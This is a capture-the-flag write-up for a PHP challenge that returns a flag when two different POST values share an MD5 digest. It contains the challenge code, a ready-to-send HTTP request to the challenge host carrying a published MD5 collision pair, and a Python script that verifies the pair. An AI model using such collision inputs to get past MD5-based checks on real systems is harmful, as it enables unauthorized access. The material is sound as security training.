Source code

<?php
// Challenge code as given. Warnings are suppressed, so e.g. passing an array
// to md5() produces no visible hint.
error_reporting(0);

// Both inputs are cast to string before the inequality test, and the two
// digests are compared with ===, i.e. as hex strings, not as numbers.
if ((string)$_POST['var1'] !== (string)$_POST['var2'] && md5($_POST['var1']) === md5($_POST['var2'])) {
    $flag = file_get_contents('/flag');
    echo $flag;
} else {
    echo "绕过PHP检测就可以得到FLAG"; // "Bypass the PHP check and you get the FLAG"
}
?>

Approach

For the theory behind strict (===) versus loose (==) comparison bugs in PHP, see:

https://www.yuque.com/shiyizhesonder/sonder39/xit572hsmwbxqkae

Intercept the request in a proxy, change the method to POST, and send the body below; the condition passes and the flag is returned (other bypasses can also be tried). Note why the usual tricks do not work here: the (string) cast turns two arrays into the identical string "Array", so the !== half of the condition fails, and === compares the hex digests as strings, so the "0e..." magic-hash trick (which depends on numeric ==) is ruled out as well. What remains is a genuine MD5 collision: two different 64-byte messages with the same digest. The values below are a published single-block MD5 collision pair; they contain non-printable bytes, so they are sent percent-encoded, and the two differ in only two bytes (%02 versus %00, and %D5 versus U). The Content-Length of 313 matches that encoded body.

POST / HTTP/1.1
Host: ctf.seek2.top:32799
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 313

var1=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2&var2=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
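To confirm the pair offline before sending it, the following Python script (an added example, not part of the original write-up) decodes the two percent-encoded values from the request above, checks that they differ yet hash to the same MD5, mirrors the challenge's PHP condition, and rebuilds the request body to verify the Content-Length of 313. The function names are my own; the two encoded strings are copied verbatim from the request.

```python
import hashlib
from urllib.parse import quote_from_bytes, unquote_to_bytes

# Percent-encoded values copied from the POST body in the write-up above.
VAR1_ENC = ("M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B"
            "%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2")
VAR2_ENC = ("M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B"
            "%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2")


def decode_form_value(encoded: str) -> bytes:
    """Decode one application/x-www-form-urlencoded value into the raw bytes
    PHP would place in $_POST. '+' means space in form bodies (none occur here)."""
    return unquote_to_bytes(encoded.replace("+", " "))


def php_check(var1: bytes, var2: bytes) -> bool:
    """Mirror of the challenge condition:
        (string)$var1 !== (string)$var2 && md5($var1) === md5($var2)
    PHP's md5() returns a lowercase hex string, so comparing hexdigests here is
    equivalent to its === on those strings (no numeric coercion, so "0e" tricks fail)."""
    return var1 != var2 and hashlib.md5(var1).hexdigest() == hashlib.md5(var2).hexdigest()


def differing_offsets(a: bytes, b: bytes) -> list:
    """Byte positions at which the two messages differ (expected: exactly two)."""
    return [i for i, (x, y) in enumerate(zip(a, b)) if x != y]


def build_post_body(var1: bytes, var2: bytes) -> bytes:
    """Re-encode the raw bytes into the request body; len() of the result is the
    Content-Length to send. safe="" so that '/' is also percent-encoded."""
    body = "var1=" + quote_from_bytes(var1, safe="") + "&var2=" + quote_from_bytes(var2, safe="")
    return body.encode("ascii")


if __name__ == "__main__":
    v1, v2 = decode_form_value(VAR1_ENC), decode_form_value(VAR2_ENC)
    print("lengths:", len(v1), len(v2))
    print("differ at offsets:", differing_offsets(v1, v2))
    print("md5(var1):", hashlib.md5(v1).hexdigest())
    print("md5(var2):", hashlib.md5(v2).hexdigest())
    print("check passes:", php_check(v1, v2))
    print("Content-Length:", len(build_post_body(v1, v2)))
```

Both messages are exactly one MD5 block (64 bytes), which is why the collision is self-contained and needs no shared prefix or suffix; any bytes appended to both would keep the collision, but the challenge compares the raw values, so the pair is sent as-is.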